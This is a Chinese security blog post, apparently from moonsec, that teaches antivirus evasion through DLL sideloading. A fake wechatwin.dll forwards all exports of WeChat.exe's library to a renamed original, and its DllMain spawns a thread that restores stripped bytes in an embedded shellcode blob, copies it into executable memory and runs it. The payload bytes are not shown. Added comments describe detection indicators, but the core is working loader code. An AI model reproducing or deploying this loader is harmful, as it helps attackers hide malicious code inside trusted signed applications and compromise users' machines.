
白加黑源码免杀学习

概述

白程序:WeChat.exe

恶意dll:wechatwin.dll

制作流程

  • 获取导出函数列表
/*
 * Export forwarder table.  Every line re-exports one symbol of the
 * original library under the same name and ordinal (@1..@36) and
 * forwards it to a module called "tmp3ACF" — presumably the renamed
 * genuine DLL, which is not shown on this page.  The host process
 * therefore resolves all its imports successfully while this module
 * sits in between.
 *
 * Review note (detection): a legitimately built wechatwin.dll has no
 * reason to forward its entire export table to a module that matches
 * no known Windows or WeChat binary name.  Walking the export directory
 * of DLLs that live next to a signed executable and flagging forwards
 * whose target module name is unknown is a cheap static indicator for
 * this kind of proxy DLL.
 */
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@$$QAV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@$$QAV0@@Z,@1")
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@ABV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@ABV0@@Z,@2")
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@XZ=tmp3ACF.??0IChannelLogWriter@@QAE@XZ,@3")
#pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z,@4")
#pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@ABV0@@Z,@5")
#pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@$$QAV0@@Z,@6")
#pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@ABV0@@Z,@7")
#pragma comment(linker, "/export:??_7IChannelLogWriter@@6B@=tmp3ACF.??_7IChannelLogWriter@@6B@,@8")
#pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHKI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHKI@Z,@9")
#pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHPAXI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHPAXI@Z,@10")
#pragma comment(linker, "/export:?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z=tmp3ACF.?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z,@11")
#pragma comment(linker, "/export:?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z=tmp3ACF.?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z,@12")
#pragma comment(linker, "/export:?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z=tmp3ACF.?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z,@13")
#pragma comment(linker, "/export:?GetBugReportFlag@TXBugReport@@YAKXZ=tmp3ACF.?GetBugReportFlag@TXBugReport@@YAKXZ,@14")
#pragma comment(linker, "/export:?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ=tmp3ACF.?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ,@15")
#pragma comment(linker, "/export:?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ=tmp3ACF.?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ,@16")
#pragma comment(linker, "/export:?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z=tmp3ACF.?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z,@17")
#pragma comment(linker, "/export:?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z=tmp3ACF.?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z,@18")
#pragma comment(linker, "/export:?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z=tmp3ACF.?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z,@19")
#pragma comment(linker, "/export:?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z=tmp3ACF.?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z,@20")
#pragma comment(linker, "/export:?SetBugReportFlag@TXBugReport@@YAHK@Z=tmp3ACF.?SetBugReportFlag@TXBugReport@@YAHK@Z,@21")
#pragma comment(linker, "/export:?SetBugReportPath@TXBugReport@@YAHPB_W@Z=tmp3ACF.?SetBugReportPath@TXBugReport@@YAHPB_W@Z,@22")
#pragma comment(linker, "/export:?SetBugReportUin@TXBugReport@@YAXKH@Z=tmp3ACF.?SetBugReportUin@TXBugReport@@YAXKH@Z,@23")
#pragma comment(linker, "/export:?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z=tmp3ACF.?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z,@24")
#pragma comment(linker, "/export:?SetExtInfo@TXBugReport@@YAHKKPB_W@Z=tmp3ACF.?SetExtInfo@TXBugReport@@YAHKKPB_W@Z,@25")
#pragma comment(linker, "/export:?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z=tmp3ACF.?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z,@26")
#pragma comment(linker, "/export:?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z=tmp3ACF.?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z,@27")
#pragma comment(linker, "/export:?UninitBugReport@TXBugReport@@YAXXZ=tmp3ACF.?UninitBugReport@TXBugReport@@YAXXZ,@28")
#pragma comment(linker, "/export:?ValidateBugReport@TXBugReport@@YAXXZ=tmp3ACF.?ValidateBugReport@TXBugReport@@YAXXZ,@29")
#pragma comment(linker, "/export:?pfPostBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPostBugReport@TXBugReport@@3P6AXXZA,@30")
#pragma comment(linker, "/export:?pfPreBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPreBugReport@TXBugReport@@3P6AXXZA,@31")
#pragma comment(linker, "/export:SignWith3Des=tmp3ACF.SignWith3Des,@32")
#pragma comment(linker, "/export:StartWachat=tmp3ACF.StartWachat,@33")
#pragma comment(linker, "/export:_TlsGetData@12=tmp3ACF._TlsGetData@12,@34")
#pragma comment(linker, "/export:_TlsStoreData@12=tmp3ACF._TlsStoreData@12,@35")
#pragma comment(linker, "/export:__ASSERT=tmp3ACF.__ASSERT,@36")

shellcode写入内存加载

/*
 * Thread entry point that stages and runs the embedded payload.
 *
 * pPara is the CreateThread argument and is never read.  The buffers
 * `shellcode`, `first` and `a` are defined elsewhere in the file and are
 * not visible on this page; what is visible is that two bytes of `first`
 * are written at offset 0 and two bytes of `a` at offset 834 of
 * `shellcode` before it is copied out — presumably restoring bytes that
 * were stripped from the stored blob so that it does not sit in the
 * binary in runnable form (to confirm against the missing definitions).
 *
 * Review note (detection): the sequence below — a fresh private
 * allocation requested directly as PAGE_EXECUTE_READWRITE, a memcpy into
 * it, and an indirect call into that region from a thread whose start
 * address is inside a DLL — is the textbook in-memory loader shape that
 * RWX-allocation telemetry, unbacked-executable-memory scans and
 * thread-start-address checks are built to catch.  The VirtualAlloc
 * result is also used without a NULL check, so an allocation failure
 * would crash the host process rather than fail quietly.
 */
DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
	// Private RWX region sized to the payload; no failure handling.
	void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	// Patch two bytes at the start and two at offset 834 (see header).
	memcpy(shellcode, first, 2);
	memcpy(shellcode + 834, a, 2);
	memcpy(exec, shellcode, sizeof shellcode);
	// Transfer control into the allocated region; never expected to return.
	((void(*)())exec)();
	return 0;
}

DllMain执行jmp_shellcode

/*
 * DLL entry point.  On DLL_PROCESS_ATTACH it starts jmp_shellcode on a
 * new thread and immediately closes the thread handle; the other three
 * notifications do nothing.  Always returns TRUE, so the loader never
 * unloads the module.
 *
 * Review note (detection): spawning a thread from DllMain during process
 * attach means the payload thread is created while the loader lock is
 * held, and its start address resolves to an export-less function inside
 * a DLL loaded from the application directory rather than from System32.
 * "Thread created from DllMain of a freshly loaded, unsigned DLL that
 * shares a name with a vendor library" is a high-signal hunting query
 * for this sideloading pattern; checking that the loaded DLL is signed by
 * the same publisher as the host executable is the corresponding
 * preventive control.
 */
BOOL WINAPI
DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{

	HANDLE threadHandle;

	switch (dwReason)
	{
	case DLL_PROCESS_ATTACH:

		// Create a thread and close the handle as we do not want to use it to wait for it 
		// (the return value of CreateThread is not checked before CloseHandle).

		threadHandle = CreateThread(NULL, 0, jmp_shellcode, NULL, 0, NULL);
		CloseHandle(threadHandle);

		break;

	case DLL_PROCESS_DETACH:
		// Code to run when the DLL is freed
		break;

	case DLL_THREAD_ATTACH:
		// Code to run when a thread is created during the DLL's lifetime
		break;

	case DLL_THREAD_DETACH:
		// Code to run when a thread ends normally.
		break;
	}
	return TRUE;
}

原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/archives/3180
